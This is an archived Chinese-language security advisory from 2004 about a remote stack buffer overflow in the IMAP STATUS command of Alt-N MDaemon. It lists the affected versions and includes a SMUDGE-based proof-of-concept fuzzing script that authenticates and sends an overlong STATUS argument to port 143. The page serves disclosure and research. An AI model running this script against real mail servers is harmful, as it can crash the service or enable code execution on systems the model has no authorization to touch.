首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Alt-N MDaemon远程Status命令远程缓冲区溢出漏洞
来源:vfocus.net 作者:vfocus 发布时间:2004-05-27  

Alt-N MDaemon远程Status命令远程缓冲区溢出漏洞

涉及程序:
Alt-N MDaemon远程Status

描述:
Alt-N MDaemon远程Status命令远程缓冲区溢出漏洞

详细:
Alt-N MDaemon是一款基于Windows的邮件服务程序。

Alt-N MDaemon的IMAP组件中包含的STATUS命令对参数缺少充分边界检查,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。

攻击者经过验证后,发送包含超长参数的STATUS命令给IMAP组件处理,可发生基于堆栈的缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。

受影响系统:
Alt-N MDaemon 6.8.5
Alt-N MDaemon 6.8.4
Alt-N MDaemon 6.8.3
Alt-N MDaemon 6.8.2
Alt-N MDaemon 6.8.1
Alt-N MDaemon 6.8.0
Alt-N MDaemon 6.7.9
Alt-N MDaemon 6.7.5
Alt-N MDaemon 6.5.0
Alt-N MDaemon 6.0.7
Alt-N MDaemon 6.0.6
Alt-N MDaemon 6.0.5
Alt-N MDaemon 6.0.0
Alt-N MDaemon 5.0.7
Alt-N MDaemon 3.5.6
Alt-N MDaemon 3.5.4
Alt-N MDaemon 3.5.1
Alt-N MDaemon 3.5.0
Alt-N MDaemon 3.1beta
Alt-N MDaemon 3.1.2
Alt-N MDaemon 3.1.1
Alt-N MDaemon 3.0.4
Alt-N MDaemon 3.0.3
Alt-N MDaemon 2.8.50
Alt-N MDaemon 2.8
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000


攻击方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

ned (nd@felinemenace.org)提供了如下测试方法:

# overflow is in the IMAP status command
# scroll down to find it.
from SMUDGE import *
sm = SMUDGE(1)

sm.setname("imap")

#sm.plain("0000 CAPABILITY");
#sm.newreq()

sm.plain("0001 LOGIN \"");
sm.plain("nd");
sm.plain("\" \"");
sm.plain("hellhell");
sm.plain("\"");
sm.newreq()

sm.plain("0002 EXAMINE \"");
sm.plain("aaa");
sm.plain("\"");
sm.newreq()

sm.plain("0003 SELECT \"");
sm.plain("Inbox");
sm.plain("\"")
sm.newreq()

sm.plain("A003 CREATE ");
sm.plain("owatagusiam/");
sm.newreq()

sm.plain("A004 LIST \"");
sm.plain("");
sm.plain("\" ");
sm.plain("*");
sm.newreq()

sm.plain("A005 RENAME ");
sm.plain("INBOX");
sm.plain(" ");
sm.plain("OLD-MAIL");
sm.newreq()

sm.plain("A006 SUBSCRIBE #");
sm.plain("news.comp.mail.mime");
sm.newreq()

sm.plain("A007 UNSUBSCRIBE #");
sm.plain("news.comp.mail.mime");
sm.newreq()

sm.plain("A008 LIST ~");
sm.plain("");
sm.plain(" ");
sm.plain("%");
sm.newreq()

sm.plain("A009 LSUB \"");
sm.plain("");
sm.plain("\" \"");
sm.plain("bob.*");
sm.plain("\"");
sm.newreq()

# MDAEMON 7.01 STACK OVERFLOW
sm.plain("A010 STATUS ");
sm.string("blurdybloop");
sm.plain(" (");
sm.string("UIDNEXT");
sm.plain(" MESSAGES)");
sm.newreq()

sm.plain("A011 APPEND ");
sm.plain("blurdybloop");
sm.plain(" (\\");
sm.plain("Seen");
sm.plain(")");
sm.plain(" {");
sm.plain("0");
sm.plain("}");
sm.newreq()

#A654 FETCH 2:4 (FLAGS BODY[HEADER.FIELDS (DATE FROM)])
sm.plain("A012 FETCH ");
sm.plain("2");
sm.plain(":");
sm.plain("2");
sm.plain(" (");
sm.plain("FLAGS");
sm.plain(" ");
sm.plain("BODY");
sm.plain("[");
sm.plain("HEADER");
sm.plain(".");
sm.plain("FIELDS");
sm.plain(" (");
sm.plain("DATE");
sm.plain(" FROM)])");
sm.newreq()

sm.plain("A013 UID ");
sm.plain("FETCH");
sm.plain(" ");
sm.plain("4827313");
sm.plain(":");
sm.plain("4827313");
sm.plain(" ");
sm.plain("FLAGS");
sm.newreq()

sm.run("127.0.0.1",143,"bottomup","multiple","yes")


解决方案:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://mdaemon.deerfield.com/


附加信息:
BUGTRAQ ID: 10366



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Apache Mod_SSL SSL_Util_UUEnco
·Apple OS X未明终端URL处理漏洞
·Microsoft Outlook 2003媒体文件
·XPCD xpcd-svga本地缓冲区溢出漏
·Vsftpd Listener远程拒绝服务漏
·Dvbbs动网论坛存在执行特殊字符
·Microsoft IE http-equiv Meta标
·PHP Input/Ouput Wrapper远程包
·Microsoft IE Codebase双反斜线
·Unix和Unix-based select()系统
·PHP-Nuke直接脚本访问安全绕过漏
·Microsoft Internet Explorer双
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved